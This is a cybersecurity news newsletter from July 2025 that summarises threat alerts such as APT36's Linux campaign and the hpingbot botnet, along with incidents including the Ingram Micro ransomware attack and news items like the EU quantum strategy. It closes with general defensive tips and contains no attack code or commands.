Cyber Briefing: 2025.07.07

APT36 hits Indian Linux systems, hpingbot botnet uses Pastebin, signed drivers abused for malware. Ingram Micro ransomware, Call of Duty PC RCE, EU builds quantum-safe network, Brazil insider arrested

Jul 07, 2025

👉 What are the latest cybersecurity alerts, incidents, and news?

Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.

First time seeing this? Please Subscribe

Get Help

🚨 Cyber Alerts

1. APT36 Targets Indian Defense Linux Systems

The Pakistan-based hacking group APT36 has shifted its tactics to target Indian defense personnel using Linux systems. The campaign uses phishing emails with weaponized ZIP files containing a malicious Linux desktop shortcut file. This file downloads a decoy document while secretly executing the primary payload, a Go-based malware called BOSS.elf. The malware then performs system reconnaissance, captures screenshots, and exfiltrates the stolen data to an attacker-controlled server.

2. Hackers Abuse Driver Signing For Malware

Cybercriminals are exploiting legitimate Windows driver signing processes to deploy sophisticated kernel-level malware. A new investigation revealed that over 620 malicious drivers and 80 compromised certificates have been used since 2020. Threat actors purchase fraudulently obtained code-signing certificates on the dark web to make their malicious drivers appear legitimate. This allows ransomware gangs like BlackCat and LockBit to bypass security and gain deep system control.

3. hpingbot Botnet Uses Pastebin C2 Channel

A new botnet called hpingbot has been discovered targeting Windows and Linux systems in Germany, the U.S., and Turkey. Unlike traditional botnets, it uses the legitimate Pastebin platform for command and control and the hping3 tool for attacks. The malware fetches its instructions from hard-coded Pastebin URLs, allowing attackers to update payloads and commands remotely. The botnet can launch over ten types of DDoS attacks and is also designed to download and execute other malware.

For more alerts, click here!

Check Jobs

💥 Cyber Incidents

4. Ransomware Attack Causes Outage at Ingram

Global IT distributor Ingram Micro has confirmed it suffered a ransomware attack that led to an ongoing system outage. The attack, which began last Thursday, has taken the company's website and online ordering platforms offline. The ransom note is associated with the SafePay ransomware operation, and the entry point is believed to be the company's VPN. Ingram Micro has taken systems offline, launched an investigation with cybersecurity experts, and is working to restore services.

5. Call of Duty Players Hacked on Game Pass

The PC version of Call of Duty WWII has been taken offline due to reports of a critical security vulnerability. A remote code execution exploit was allowing players to take over other gamers' computers during live multiplayer matches. Attackers were able to remotely open command prompts, send messages, and even shut down the victims' personal computers. The vulnerability likely stems from the game's peer-to-peer networking and only affects PC players on platforms like Game Pass.

6. RansomHub Claims Theft of Coppell City Data

The City of Coppell, Texas, is notifying over 16,000 residents of a data breach stemming from an October 2024 cyberattack. The RansomHub ransomware gang claimed responsibility for the attack, alleging it had stolen 442 gigabytes of city data. The breach exposed residents' sensitive information, including Social Security numbers, driver's license numbers, and financial data. While the city has not confirmed the hacker's claims, it is now offering impacted residents one year of free credit monitoring.

For more incidents, click here!

Click to Read

📢 Cyber News

7. EU Plans Quantum Secure Network by 2030

The European Union has launched a new Quantum Strategy aimed at becoming a global leader in the field by 2030. A key focus is developing quantum-secure communications to counter the future threat of quantum computers breaking current encryption. The plan includes building an EU-wide secure network called EuroQCI, which will combine terrestrial and satellite systems. This comes as governments push for post-quantum standards, while research shows most organizations have been slow to prepare.

8. Prime Day Scams Use 1000 Fake Amazon Sites

Security researchers are warning shoppers about a surge in scams ahead of Amazon Prime Day on July 8th. In June alone, over 1,000 domains impersonating Amazon were created, with 87% flagged as malicious or suspicious. Scammers use fake websites and phishing emails with urgent subject lines to steal Amazon login credentials and financial information. Consumers are urged to shop directly on Amazon's site, avoid suspicious links, and be wary of deals that seem too good to be true.

9. Insider Arrested in Brazil PIX System Hack

Brazilian police have arrested an employee of the technology firm C&M Software in connection with a $100 million cyberattack. The suspect, João Roque, allegedly sold his credentials to hackers who then used them to steal funds from Brazil's PIX instant payment system. The fraud, which took place in a single night, affected multiple financial institutions but not individual clients. In response, Brazil's Central Bank has suspended the company's access to the system as police continue to investigate and freeze the stolen assets.

For more news, click here!

Check Events

💡 Cyber Tip

Watch Out for hpingbot Botnet Hiding Commands on Pastebin

A newly discovered botnet named hpingbot is targeting Windows, Linux, and IoT systems by abusing Pastebin to deliver its commands. The malware uses hardcoded Pastebin URLs as its command-and-control channel, making it harder to detect using traditional security tools. Infected systems can be instructed to launch over ten types of DDoS attacks or download additional malware. Researchers have observed hpingbot activity in Germany, the United States, and Turkey.

✅ What you should do:

Monitor outbound traffic for unusual connections to Pastebin or similar text-hosting platforms.
Use endpoint protection that can detect abuse of legitimate tools like hping3 and obfuscated command channels.
Regularly patch systems and secure IoT devices to prevent botnet infections.
Block or restrict access to known Pastebin URLs at the network level if not needed.
Conduct threat hunting for signs of hpingbot-specific behaviors or binaries in your environment.

🔒 Why this matters:

Hpingbot is a custom-built botnet that blends into normal traffic by using a legitimate platform for communication. Its dual use for DDoS and malware delivery makes it a high-risk threat. Staying vigilant against subtle command channels like Pastebin is essential for detecting modern botnets.